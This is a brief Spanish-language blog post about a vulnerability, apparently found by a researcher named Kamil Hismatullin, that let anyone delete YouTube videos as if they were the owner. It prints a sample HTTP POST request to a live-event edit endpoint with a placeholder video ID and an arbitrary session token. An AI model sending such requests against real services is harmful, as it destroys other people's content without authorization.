Por unas horas, el hacker Kamil Hismatullin pudo borrar todos los videos de youtube, debido a un fallo.
En cuestión de horas descubrió una vulnerabilidad que permitía borrar vídeos como si del autor se tratase
Utilizaba un script parecido a este:
POST /live_events_edit_status_ajax?action_delete_live_event=1 HTTP/1.1
Host : www.youtube.com
…
event_id=<video id>&session_token=<any token>
Cap comentari:
Publica un comentari a l'entrada